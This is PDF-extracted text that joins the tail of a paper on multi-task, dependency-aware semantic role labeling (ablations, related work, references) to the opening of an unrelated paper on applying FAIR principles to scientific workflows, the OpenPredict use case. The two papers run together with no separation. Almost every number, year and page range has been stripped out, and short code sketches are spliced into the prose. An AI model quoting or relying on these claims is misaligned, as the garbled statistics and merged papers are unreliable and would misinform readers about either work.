syntactic features for long-distance argu- ments and share them with the semantic role labeler. as shown in the first bar of figure , arguments not directly linked to the predicate are identified more accurately with the full model (f improves by approximately percentage point). finally, instead of building a dependency information extractor, we simply took the one-best outputs of the trained full parser and directly used them as word representations (i.e., replacing the elink and elabel). this means that the full parser is pre-trained and its parameters will not be updated during the training process for srl. 
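the contrast at play here, between the soft, probability-weighted composition of dependency label embeddings used by the full model and a hard one-best lookup, can be illustrated with the following sketch (pytorch, with hypothetical sizes; an illustration of the two strategies, not the authors' code).

import torch
import torch.nn.functional as F

def soft_label_embedding(label_logits, label_emb):
    """e_label as defined earlier: a probability-weighted sum of all dependency
    label embeddings, so low-confidence predictions contribute proportionally."""
    probs = F.softmax(label_logits, dim=-1)     # (batch, n_labels)
    return probs @ label_emb.weight             # (batch, d_label)

def one_best_label_embedding(label_logits, label_emb):
    """the hard alternative: embed only the single highest-scoring label,
    which over-commits to possibly noisy predictions."""
    best = label_logits.argmax(dim=-1)          # (batch,)
    return label_emb(best)                      # (batch, d_label)

# usage sketch with hypothetical sizes
label_emb = torch.nn.Embedding(num_embeddings=40, embedding_dim=32)
logits = torch.randn(8, 40)
e_soft = soft_label_embedding(logits, label_emb)
e_hard = one_best_label_embedding(logits, label_emb)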
we see (row ‘‘w/o joint training’’ in table ) that compared with the model using a full parser, removing joint training further hurts srl performance ( . percentage point drop in f ). . dependency annotations although our model does not rely on an exter- nal parser for providing information pertaining to dependency relations, it nevertheless requires gold standard dependency annotations for training the dependency extractor component (i.e., depen- dency label and link prediction). as manual anno- tations are expensive and not always available, we also examined whether it is possible to obtain competitive performance with fewer annotations. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : srl performance on the english conll- development set when different proportions of dependency annotations are used for training. figure shows how f varies when the full model is trained on increasing amounts of depen- dency annotations. like our previous ablation studies, we do not perform predicate disambigua- tion and do not use character embeddings in these experiments. we randomly choose a subset of training samples ( %, % etc.) with depen- dency annotations, and if the input sample is in the subset, we update model parameters during training according to the combined loss of the srl and auxiliary tasks, otherwise parameters are updated for the srl task only. it is obvious from figure that the performance of our model increases gradually with more annotations. interestingly, we observe a large jump in performance with only % of the available dependency annotations (f improves from . % to %). the model’s performance becomes competitive when % of the annotations are used, and remains stable when more annotations are provided. in general, these results suggest that our model can also work effectively when a small number of gold dependency labels are given as a supervision signal to the dependency information extractor. related work our model resonates with the recent trend of developing neural network models for semantic role labeling. it also agrees with previous work in devising ways to better take advantage of syntactic information for the srl task within a relatively simple modeling framework based on bi-directional lstms (marcheggiani et al., ). previous proposals for incorporating syn- tactic information include the use of low-rank tensor factorizations (lei et al., ), convolu- tional and time-domain neural networks (foland and martin, ), jointly embedded arguments and semantic roles in a shared vector space (fitzgerald et al., ), learning representations of shortest dependency paths between a predicate and its potential arguments (roth and lapata, ), encoding sentences with graph convolu- tional networks (marcheggiani and titov, ), constrained decoding (he et al., ), and argu- ment pruning (he et al., ). in contrast to these approaches, we do not use an external dependency parser but rather incorporate syntactic informa- tion as part of the model’s learning objective. aside from assigning semantic roles, our model performs two auxiliary tasks (dependency and link type prediction), thereby learning syntactic information specific to the srl task. multi-task learning (mtl; caruana, ) has been a popular approach for various nlp tasks, starting with collobert et al. ( a) who propose a multi-task model for pos-tagging, chunking, named entity recognition, and srl. 
søgaard and goldberg ( ) train a multi-task model for pos-tagging, syntactic chunking, and combinatory categorical grammar supertagging, while hashimoto et al. ( ) introduce a joint many-task model together with a strategy for suc- cessively growing its depth to solve increasingly complex tasks. zhang and weiss ( ) propose stack-propagation using a continuous and differ- entiable link between pos tagging and depen- dency parsing, in which pos tags are utilized as a regularizer of learned representations for parsing. mtl has also been applied to semantic depen- dency parsing (peng et al., ; swayamdipta et al., ) and semantic role labeling. strubell et al. ( ) present an end-to-end srl model that is trained to jointly predict parts of speech and predicates, perform parsing, and attend to syntactic parse parents, while assigning semantic role labels. most recent mtl models (bingel and søgaard, ; hashimoto et al., ) use different layers for multiple tasks with different datasets, separately optimizing each task at each epoch. in our case, the srl task and the two auxiliary tasks share the same input, and as a result optimization for all three tasks takes place simultaneously which is more efficient. also, in terms of model architecture, information from the auxiliary tasks is not incorporated by simply stacking layers on top of each other but rather is explored more directly by serving as input to the srl model downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april itself. like strubell et al. ( ), we resort to multi-task learning in order to make use of lin- guistic information for semantic role labeling as effectively as possible. our model is simpler in eschewing the training of a parser; it also does not predict part of speech tags or predicates, although such auxiliary tasks could be incorporated in the future. we introduce novel auxiliary tasks such as predicting the dependency label of a word and whether there exists an arc linking it to the predicate and show that they improve srl performance for english and other languages. conclusions in this paper, we proposed a multi-task model that learns dependency aware representations for semantic role labeling without using any external parser. experimental results across languages have shown improvements over competitive baselines and state-of-the-art systems. through several ablation studies we have also confirmed that hidden-layer representations, pre-trained word embeddings, and label embeddings all contribute in improving the performance of our srl model. although the dependency extractor takes a rather local view of the sentence, concentrating on the predicate and closely related neighbors, more global syntactic information is neverthe- less implicitly captured. even when dependency annotations are sparse, our model is able to encap- sulate syntactic information and improve upon a syntax agnostic variant. directions for future work are many and varied. we would like to improve our multi-task model by determining the value of α (i.e., the loss weight for the two auxiliary tasks) dynamically. this would allow us to optimize performance for the main and auxiliary tasks at the same time. our experiments in this work have focused exclusively on dependency-based formalisms for representing semantic predicate-argument structures (as oper- ationalized in the conll- shared task). 
an interesting question is whether our model would work equally well for semantic role representa- tions based on constituents (i.e., phrases or spans) such as those annotated in the conll- shared task (carreras and màrquez, ) or ontonotes (pradhan et al., ). addressing this question would also allow direct comparisons with recently proposed span-based models (he et al., ; strubell et al., ). finally, a more ambitious goal would be to learn a semantic role labeler in a weakly supervised setting where only annotations for dependency labels are available. acknowledgments we thank the anonymous reviewers for their feed- back and the action editor alessandro moschitti for his comments. we gratefully acknowledge the support of the european research council (award number , ‘‘translating multiple modalities into text’’). references wilker aziz, miguel rios, and lucia specia. . shallow semantic trees for smt. in proceedings of the sixth workshop on sta- tistical machine translation, pages – . edinburgh. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in proceedings of the rd international confer- ence on learning representations. san diego, ca. joachim bingel and anders søgaard. . iden- tifying beneficial task relations for multi-task learning in deep neural networks. in proceed- ings of the th conference of the european chapter of the association for computa- tional linguistics: volume , short papers, pages – . johannes bjerva, barbara plank, and johan bos. . semantic tagging with deep residual networks. in proceedings of coling , the th international conference on com- putational linguistics: technical papers, pages – . osaka. anders björkelund, bernd bohnet, love hafdell, and pierre nugues. . a high-performance syntactic and semantic dependency parser. in proceedings of the rd international con- ference on computational linguistics: demon- strations, pages – . piotr bojanowski, edouard grave, armand joulin, and tomas mikolov. . enriching word vec- tors with subword information. transactions of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the association for computational linguistics, : – . xavier carreras and lluı́s màrquez. . intro- duction to the conll- shared task: se- mantic role labeling. in proceedings of the ninth conference on computational nat- ural language learning (conll- ), pages – . ann arbor, mi. richard caruana. . multitask learning: a knowledge-based source of inductive bias. in proceedings of the th international con- ference on machine learning, pages – . hao cheng, hao fang, and mari ostendorf. . open-domain name error detection using a multi-task rnn. in proceedings of the conference on empirical methods in natural language processing, pages – . lisbon. janara christensen, mausam, stephen soderland, and oren etzioni. . an analysis of open information extraction based on semantic role labeling. in proceedings of the th inter- national conference on konwledge capture, pages – . banff. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. a. natural language processing (almost) from scratch. journal of machine learning research, (aug): – . ronan collobert, jason weston, michael karlen, léon bottou, koray kavukcuoglu, and pavel kuksa. b. natural language process- ing (almost) from scratch. journal of machine learning research, (aug): – . timothy dozat and christopher d. manning. . 
deep biaffine attention for neural depend- ency parsing. corr, abs/ . . david k duvenaud, dougal maclaurin, jorge iparraguirre, rafael bombarell, timothy hirzel, alan aspuru-guzik, and ryan p. adams. . convolutional networks on graphs for learning molecular fingerprints. in advances in neural information processing systems , pages – . chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition-based dependency parsing with stack long short-term memory. in proceedings of the rd annual meeting of the association for computational linguistics and the th inter- national joint conference on natural lan- guage processing (volume : long papers), pages – . nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the conference on empirical methods in natural language processing, pages – . lisbon. william foland and james martin. . dependency-based semantic role labeling using convolutional neural networks. in proceedings of the fourth joint conference on lexical and computational semantics, pages – . nelson francis and henry kucera. , brown corpus manual. technical report, department of linguistics, brown unviersity, providence, ri. jan hajič, massimiliano ciaramita, richard johansson, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue, and yi zhang. . the conll- shared task: syntactic and semantic dependencies in multiple languages. in proceedings of the thirteenth conference on computational nat- ural language learning (conll ): shared task, pages – . boulder, co. eva hajičová, zdeněk kirschner, and petr sgall. . a manual for analytic layer annotation of the prague dependency treebank (english translation), úfal mff uk, prague, czech republic. kazuma hashimoto, caiming xiong, yoshimasa tsuruoka, and richard socher. . a joint many-task model: growing a neural network for multiple nlp tasks. in proceedings of the conference on empirical methods in natural language processing, pages – . luheng he, kenton lee, mike lewis, and luke zettlemoyer. . deep semantic role label- ing: what works and what’s next. in pro- ceedings of the th annual meeting of the association for computational linguistics downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (volume : long papers), pages – . vancouver. shexia he, zuchao li, hai zhao, and hongxiao bai. . syntax for semantic role labeling, to be, or not to be. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, : – . richard johansson and pierre nugues. . the effect of syntactic representation on semantic role labeling. in proceedings of the nd international conference on computational linguistics, pages – . manchester. steven kearnes, kevin mccloskey, marc berndl, vijay pande, and patrick riley. . mo- lecular graph convolutions: moving beyond fingerprints. journal of computer-aided mo- lecular design, ( ): – . atif khan, naomie salim, and yogan jaya kumar. . a framework for multi-document ab- stractive summarization based on semantic role labelling. applied soft computing, : – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint, arxiv: . . eliyahu kiperwasser and yoav goldberg. . 
thomas n. kipf and max welling. . semi-supervised classification with graph convolutional networks. in proceedings of the th international conference on learning representations. toulon.
joel lang and mirella lapata. . unsupervised induction of semantic roles. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – .
tao lei, yuan zhang, lluís màrquez, alessandro moschitti, and regina barzilay. . high-order low-rank tensors for semantic role labeling. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . denver, co.
wang ling, chris dyer, alan w. black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . denver, co.
minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task sequence to sequence learning. in proceedings of the international conference on learning representations. san juan, pr.
diego marcheggiani, joost bastings, and ivan titov. . exploiting semantics in neural machine translation with graph convolutional networks. in proceedings of the th annual conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt ). new orleans, la.
diego marcheggiani, anton frolov, and ivan titov. . a simple and accurate syntax-agnostic neural model for dependency-based semantic role labeling. in proceedings of the st conference on computational natural language learning (conll ), pages – . vancouver.
diego marcheggiani and ivan titov. . encoding sentences with graph convolutional networks for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pages – . copenhagen.
tomas mikolov, ilya sutskever, kai chen, greg s. corrado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neural information processing systems , pages – .
martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – .
mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computational linguistics, ( ): – .
hao peng, sam thomson, and noah a. smith. . deep multitask learning for semantic dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – .
matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep contextualized word representations. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – .
barbara plank. . keystroke dynamics as signal for shallow syntactic parsing. in proceedings of the th international conference on computational linguistics: technical papers, pages – . osaka.
sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic analysis using ontonotes. in proceedings of the seventeenth conference on computational natural language learning, pages – . sofia.
michael roth and mirella lapata. . neural semantic role labeling with dependency path embeddings. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . berlin.
anders søgaard and yoav goldberg. . deep multi-task learning with low level tasks supervised at lower layers. in proceedings of the th annual meeting of the association for computational linguistics (volume : short papers), pages – . berlin.
emma strubell, patrick verga, daniel andor, david weiss, and andrew mccallum. . linguistically-informed self-attention for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pages – .
mihai surdeanu, richard johansson, adam meyers, lluís màrquez, and joakim nivre. . the conll shared task on joint parsing of syntactic and semantic dependencies. in conll : proceedings of the th conference on computational natural language learning, pages – .
swabha swayamdipta, sam thomson, chris dyer, and noah a. smith. . frame-semantic parsing with softmax-margin segmental rnns and a syntactic scaffold. arxiv preprint, arxiv: . .
oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in proceedings of the th international conference on neural information processing systems, pages – . montreal.
nianwen xue, fei xia, fu dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engineering, ( ): – .
nianwen xue and martha palmer. . adding semantic roles to the chinese treebank. natural language engineering, ( ): – .
yuan zhang and david weiss. . stack-propagation: improved representation learning for syntax. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – .
jie zhou and wei xu. . end-to-end learning of semantic role labeling using recurrent neural networks. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . beijing.
submitted november, accepted june, published september
corresponding authors: remzi celebi, remzi.celebi@maastrichtuniversity.nl; joao rebelo moreira, j.luizrebelomoreira@utwente.nl
academic editor: silvio peroni
additional information and declarations can be found on page
doi . /peerj-cs.
copyright celebi et al., distributed under creative commons cc-by . open access
towards fair protocols and workflows: the openpredict use case
remzi celebi ,*, joao rebelo moreira ,*, ahmed a. hassan , sandeep ayyar , lars ridder , tobias kuhn and michel dumontier
institute of data science, maastricht university, maastricht, netherlands
computer science, vu university amsterdam, amsterdam, netherlands
pharmacology & personalised medicine, maastricht university, maastricht, netherlands
medical informatics, stanford university, palo alto, ca, united states of america
netherlands escience center, amsterdam, netherlands
* these authors contributed equally to this work.
abstract
it is essential for the advancement of science that researchers share, reuse and reproduce each other's workflows and protocols. the fair principles are a set of guidelines that aim to maximize the value and usefulness of research data, and emphasize the importance of making digital objects findable and reusable by others. the question of how to apply these principles not just to data but also to the workflows and protocols that consume and produce them is still under debate and poses a number of challenges. in this paper we describe a two-fold approach of simultaneously applying the fair principles to scientific workflows as well as the involved data. we apply and evaluate our approach on the case of the predict workflow, a highly cited drug repurposing workflow. this includes fairification of the involved datasets, as well as applying semantic technologies to represent and store data about the detailed versions of the general protocol, of the concrete workflow instructions, and of their execution traces. we propose a semantic model to address these specific requirements and evaluate it by answering competency questions. this semantic model consists of classes and relations from a number of existing ontologies, including workflow ever, prov, edam, and bpmn. this then allowed us to formulate and answer new kinds of competency questions. our evaluation shows the high degree to which our fairified openpredict workflow now adheres to the fair principles, and the practicality and usefulness of being able to answer our new competency questions.
subjects bioinformatics, data science, world wide web and web science, software engineering
keywords ontology-driven healthcare, fair workflows, drug repurposing, scientific workflows and protocols, reproducibility, semantic web, research object, fair data principles
how to cite this article celebi r, rebelo moreira j, hassan aa, ayyar s, ridder l, kuhn t, dumontier m. . towards fair protocols and workflows: the openpredict use case. peerj comput. sci. :e http://doi.org/ . /peerj-cs.
introduction
reproducible results are one of the main goals of science. a recent survey, however, showed that more than % of researchers have been unsuccessful in reproducing another research experiment and more than % failed to reproduce their own research studies (baker, ). the rate of non-reproducibility for pharmacological studies is particularly worrying. together with their high costs and their high rate of failure (around %), this highlights the need for new approaches in drug discovery (scannell et al., ).
for these reasons, we chose pharmacology as the field to apply and test the approach we will introduce below. specifically, we will be looking into drug repositioning, where small molecules approved for one indication are repurposed for a new indication. drug repositioning is gaining recognition as a safe, effective and lower-cost approach to uncover new drug uses (ashburn & thor, ; sleigh & barton, ). the availability of public data, both in the form of literature-curated knowledge and omics data, has created exciting opportunities for computational drug repositioning. for instance, gene expression data in repositories such as the gene expression omnibus (geo) enable the analysis of correlations between drug and gene expression, termed the connectivity map approach, to find chemicals that may counter cellular disorders (barrett & edgar, ), including alzheimer's and small cell lung cancer (lamb et al., ; sirota et al., ). more sophisticated approaches use network analysis and machine learning to efficiently combine drug and disease data (cheng et al., ; gottlieb et al., ; hoehndorf et al., ; wu et al., ; bisgin et al., ).
the ability to reproduce original research results is contingent on the availability of the original data, methods and results. the fair principles (wilkinson et al., ) describe a set of requirements for data management and stewardship to make research data findable, accessible, interoperable, and reusable. ongoing efforts on fair cover data policies, data management plans, identifier mechanisms, standards and data repositories (collins et al., ). highly diverse communities, from the biomedical sciences to the social sciences and humanities, are now working towards defining standards for publication and sharing of data. in anticipation, new methods and infrastructure are needed to facilitate the generation of fair data and workflows.
here, we describe a methodology to publish scientific workflows as fair data. we are using the term workflow here to include computational steps implemented in software but also manual steps, such as manual data cleaning steps or wet-lab activities. we evaluate our method by applying it to the predict drug repositioning workflow. based on this example, we will try to answer our research question of how we can use existing vocabularies and techniques to make scientific workflows more open and fair, with a particular focus on the interoperability aspect. the main contributions of this paper are (a) general guidelines to make scientific workflows open and fair, focusing on the interoperability aspect, (b) the openpredict use case, demonstrating the open and fair version of the predict workflow, (c) new competency questions for previously unaddressed reproducibility requirements, and (d) evaluation results on the practicality and usefulness of our approach.
background
below, we refer to the most relevant background with respect to reproducibility, workflow systems, and applying fair to workflows.
scientific workflows and reproducibility according to the descriptive ontology for linguistic and cognitive engineering (dolce) (borgo & masolo, ), a workflow is a ’’plan that defines role(s), task(s), and a celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specific structure for tasks to be executed, usually supporting the work of an organization’’, and a plan is a description of instructions with an explicit goal. a scientific workflow, therefore, is such a plan that implements scientific methods to work towards the general goal of scientific knowledge gathering and organization. certain scientific workflows can be automated through workflow systems, which are software systems that enable the representation and execution of structured tasks. the lack of relevant details in the published descriptions of scientific workflows (vasilevsky et al., ) is an important factor contributing to the non-reproducibility rates of % in pharmacology (ioannidis, a; prinz, schlange & asadullah, ), % in cancer research (begley & ellis, ), and % in psychology (klein et al., ). a recent analysis of over . million jupyter notebooks (available in github) found that only . % of the notebooks could be executed without errors and only . % produced the same results (pimentel et al., ). as a consequence, it has been reported that data scientists spend % of their time finding, understanding and accessing datasets, and % of their time cleaning and organizing these datasets to use in their studies (crowdflower, ). thus, only % of the time is left for data scientists to spend on their core activities, such as mining data, refining algorithms, building training sets and analyzing the results. workflow systems to tackle the workflow decay phenomenon (hettne et al., ), a number of recent initiatives are targeting the improvement of the reproducibility of computational workflows for example the common workflow language (cwl) (https://www.commonwl.org/) and the workflow description language (wdl) (https://openwdl.org/), which have become the de facto standard for syntactic interoperability of workflow management systems. cwl and wdl are aimed to exchange and run computational workflows reproducibly in different environments. they are designed to separate the workflow description from its execution. in order to improve semantic interoperability and connect workflows to real-world entities in a systematic way, additions of semantic models and methods have been proposed, for example the workflow ever project with its research objects method (belhajjame et al., ). provenance is an important aspect of workflows, which can be classified into prospective provenance, retrospective provenance, and workflow evolution provenance. prospective provenance refers to the specifications or ‘‘recipes’’ that describe the workflow steps and their execution order, typically as an abstract representation of these steps (protocols), as well as expected inputs and outputs (cohen-boulakia et al., ). retrospective provenance refers to the information about actual workflow executions that happened in the past, including the concrete activities that consumed inputs and produced outputs, as well as information about the execution environment (khan et al., ). workflow evolution provenance refers to tracking the versions of workflow specifications and the respective data, as the workflow specification is changed and improved over time. 
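to make the distinction between these kinds of provenance concrete, the following is a minimal sketch of our own (not taken from any of the cited systems) that records both a prospective and a retrospective statement for a single step with rdflib; the namespace iris follow the published prov and p-plan vocabularies, while the resource names and the timestamp are purely illustrative assumptions.

from rdflib import Graph, Namespace, Literal
from rdflib.namespace import RDF, XSD

PPLAN = Namespace("http://purl.org/net/p-plan#")   # p-plan vocabulary
PROV = Namespace("http://www.w3.org/ns/prov#")     # prov-o vocabulary
EX = Namespace("http://example.org/wf/")           # hypothetical resources

g = Graph()
g.bind("p-plan", PPLAN); g.bind("prov", PROV); g.bind("ex", EX)

# prospective provenance: the "recipe" (a step and its expected output variable)
g.add((EX.step_clean_data, RDF.type, PPLAN.Step))
g.add((EX.step_clean_data, PPLAN.hasOutputVar, EX.var_clean_table))

# retrospective provenance: one concrete execution of that step and its output
g.add((EX.activity_run, RDF.type, PPLAN.Activity))
g.add((EX.activity_run, PPLAN.correspondsToStep, EX.step_clean_data))
g.add((EX.activity_run, PROV.generated, EX.clean_table_output))
g.add((EX.activity_run, PROV.endedAtTime,
       Literal("2020-01-15T10:00:00", datatype=XSD.dateTime)))

print(g.serialize(format="turtle"))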
a number of models and methods have been developed to capture these different kinds of provenance. the prov ontology (lebo et al., ) provides the vocabulary and model for provenance in general, which can be used in conjunction with top-level ontologies such celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.commonwl.org/ https://openwdl.org/ http://dx.doi.org/ . /peerj-cs. as dolce (borgo & masolo, ) and other general vocabularies such as dublin core and schema.org. several approaches have been proposed to apply prov to workflows, such as the open provenance model for workflows (opmw) (moreau et al., ), p-plan (garijo & gil, ), and cwlprov (soiland-reyes et al., ). other notable examples include provbook and the reproduce-me ontology (samuel & könig-ries, a; samuel & könig-ries, b) for workflows in jupyter notebooks, the ml-schema ontology for machine learning workflows (correa publio et al., ), the publishing workflow ontology (pwo) for workflows in scientific publications (hartanto, sarno & ariyani, ), and the business process modelling notation (bpmn) to specify business processes (rospocher, ghidini & serafini, ). other approaches, such as smart protocols (giraldo et al., ) and protocols.io, target the description of laboratory protocols. applying fair to workflows the fair principles have received significant attention, but we currently lack overarching approaches to align them with scientific protocols and workflows in a broad sense. making a workflow fair-compliant entails that general-purpose software can interpret it and understand its context. the application of fair in healthcare, for example, has shown that these principles boost data-driven applications that require the integration of data coming from different sources, achieving ‘‘interoperability without the need to all speak exactly the same language’’ (imming et al., ). recent initiatives have outlined how fair can be applied to software (neil & daniel, ; lamprecht et al., ), contributing towards the goal of applying fair not just to input and output data, but to the entire process in between, in order to solve the current problem that even human experts are often unable to reconstruct the specific steps and parameters of a workflow from what is published in scientific articles (vasilevsky et al., ). the fairification jacobsen et al. ( ) consists of a number of steps required to transform an existing data element to its fair version, typically leveraging the rdf technology for the interoperability aspect. rdf is a broadly applicable formal language to achieve the semantic interoperability principle i . fairification starts by retrieving the non-fair data from its sources. subsequently these datasets are analyzed to understand the data structures and how they are mapped to concepts from the domain. the next step, semantic modelling, is a major activity comprising semantic harmonisation and integration, requiring the reuse and/or creation of models compliant with the fair principles. once the dataset is aligned with semantic definitions, it can be expressed in rdf and augmented with metadata. the last step is to store the fairified data into a findable and accessible manner. the fair workflows approach in this section we describe our workflow representation requirements, with a special focus on the coverage of manual steps, different workflow abstraction levels, and versioning on all these levels. we formulate these requirements as competency questions and present a celebi et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. configuration of elements from existing semantic models as a unified model to answer these competency questions. requirements and competency questions with the help of structured interviews with data scientists and a gap analysis of the literature, we formulated user requirements for the reproducibility of workflows (the details of the interviews are given in appendix s ). the interviewees stated that they experience many challenges in reproducing their or others’ work, due to the lack of details of workflow steps, data cleaning and filtering. also essential information, such as processing parameters or design details needed to reproduce the results, is often missing. some of these requirements are already covered by existing approaches while others have not been addressed so far. the interviews indicated that the definitions of manual processes of workflows are usually missing or incomplete, which is a requirement poorly addressed by computational workflow approaches. often, software libraries, packages and versions of tools used are not explicitly recorded. the interviewees suggested making metadata of the datasets accessible, add richer prospective and retrospective provenance and allowing for fine-grained workflow versioning linked to outputs produced during distinct executions. a unanimous recommendation was to allow for the separate input of relevant workflow parameters, so that one can run the same workflow multiple times with different processing options without having to change the workflow itself. the representation of software environment details (e.g., the used libraries and packages) is already addressed by some of the surveyed semantic models, like workflow ever, cwlprov and reproduce-me. we checked the capabilities of the existing semantic approaches to address the needs collected from the interviews. we concluded that none of the related work could completely address all the requirements together. the missing parts can be put in three main categories: (cq ) manual steps description and executions; (cq ) abstraction levels of workflows; and (cq ) versioning of executed workflows. therefore, we propose the following additional sets of competency questions (cq) to cover these missing parts: the first group of questions (cq ) is about manual steps: cq . which steps are meant to be executed manually and which to be executed computationally? cq . for the manual steps, who are the agents responsible to execute them (individuals and roles)? cq . which datasets were manually handled and their respective formats? cq . what are the types of manual steps involved? the second group (cq ) is about instantiation of general workflows by more specific ones: cq . what are the main steps of a general workflow? cq . what are the steps of a specific workflow and how are they described? celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure unified semantic model for workflows. full-size doi: . /peerjcs. /fig- cq . what higher-level description instantiated a certain workflow step? cq . who or what method made the instantiation of a semantic/meta level description of a step into an executable workflow step? the third group (cq ) are questions about versioning of workflows and their executions: cq . what are the existing versions of a workflow and what are their provenances? cq . 
which instructions were removed/changed/added from one version to another? cq . which steps were automatized from one version to another? cq . which datasets were removed/changed/added for the different versions? cq . which workflow version was used in each execution and what was generated? to the best of our knowledge, none of the previous research on semantic modelling of workflows (or protocols/processes) addresses all these requirements together. in few cases some semantic models only partially cover some questions, as explained in the prior section. unified model from the study of the diverse existing semantic models for workflows and protocols, we compiled a unified conceptual model covering the elements required to answer our competency questions. for this, we applied the ontology-driven conceptual modelling approach (guizzardi et al., ), which is based on the unified foundational ontology (ufo) and its ontological language ontouml (moreira et al., ). figure illustrates the main elements of our unified model (https://w id.org/fair/plex), which is primarily based on dolce ultra lite (dul), prov, p-plan and bpmn . . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://w id.org/fair/plex http://dx.doi.org/ . /peerj-cs. the most relevant ontology used is p-plan, which provides an abstract terminology of the main building blocks to describe plans. the p-plan:plan category is the core element of our unified model and is the class used to classify any type of instruction. it allows for the composition of instruction by means of smaller steps (p-plan:step) that have input and output variables (p-plan:variable). with the pwo:hasfirststep property, we can indicate the first step of a plan, and with dul:precedes, we can indicate whenever a step precedes another, thereby enabling the representation of sequential and parallel steps. we decouple a particular step within a workflow from its instruction with the pattern p-plan:step dul:isdescribedby p-plan:plan, where each step always points to one plan. this approach allows us to separate the workflow steps, enabling the reuse of instructions by different workflows. therefore, in our approach a step is a lightweight object (like a pointer) that serves only for ordering of instructions without coupling them to the specific workflow. besides that, we use the dul:isdescribedby property as a self-relationship of p-plan:plan, to represent that an instruction describes another instruction in a different abstraction level. with this approach, we can represent anything from high-level abstract protocols to concrete and executable workflow steps, and the links between these levels. this can be used to first represent the general protocol and then move to the definition of the executable steps akin to the common software engineering phases of specification and implementation. our model can however also be used in the other direction to extract a new common protocol from similar existing concrete workflows. at the more abstract levels, instructions are written in a natural language like english (or possibly pseudo-code), whereas at the lowest level, we find the executable specifications, which can be written in a programming language and thereby automatically executable. alternatively, at the lowest level instructions can be in natural language, such as for wet-lab instructions, which can naturally only be executed in a manual fashion. 
for example, the first general step of a specification of a machine learning pipeline like openpredict (to which we will come back to shortly) might be to ‘‘load all features and gold standard’’ (a p-plan:plan). the concrete execution of this general step is described by four concrete and executable steps (written in a language such as python), each having a link (dul:isdescribedby) to the general description of the step. we use the bpmn . ontology for the representation of manual and computational activities with bpmn:manualtask and bpmn:scripttask, which we both define as subclasses of p-plan:step. with this approach, the modeller can therefore include manual and automated steps in the same workflow. more specific classes can be used for particular workflow systems, such as reprod:cell as a kind of bpmn:scripttask describing a code cell in a jupyter notebook. we follow the fair data point specification (https://github.com/fairdatateam/ fairdatapoint-spec) for the representation of datasets (input and output) through the dcat:dataset element, which should be linked to the available distributions (dcat:distribution) through the dcat:distribution property, and the url to download the distribution is represented with dcat:downloadurl. we improved this approach with data formats from the edam ontology through the dcat:mediatype property. we use celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/fairdatateam/fairdatapoint-spec https://github.com/fairdatateam/fairdatapoint-spec http://dx.doi.org/ . /peerj-cs. prov:qualifiedusage for variable bindings. for example, the instruction (p-plan:plan) to ‘‘download a dataset and save it in the local environment’’ has a link (prov:qualifiedusage) to the ‘‘binding the online dataset to a local variable’’ (prov:usage), which represents the connection between the dataset distribution (dcat:distribution) and the local variable (p-plan:variable) through instances of the prov:entity properties. for the representation of retrospective provenance, i.e., information about prior executions of a workflow, we follow the p-plan approach by using p-plan:activity and linking it to the steps with p-plan:correspondstostep. to represent the roles of the different involved agents (such as people and software), we use the agent associations as defined in prov. for example, the jupyter notebook (prov:softwareagent) was used as execution environment (prov:role) for all computational steps of the openpredict workflow. furthermore, as a practical design decision, we extended the notion of prov:association for endurants, so the modeller can apply the association pattern similarly to the perdurant way, i.e., use the property prov:hadplan from p-plan:association to p-plan:plan instead of the relation from prov:activity through 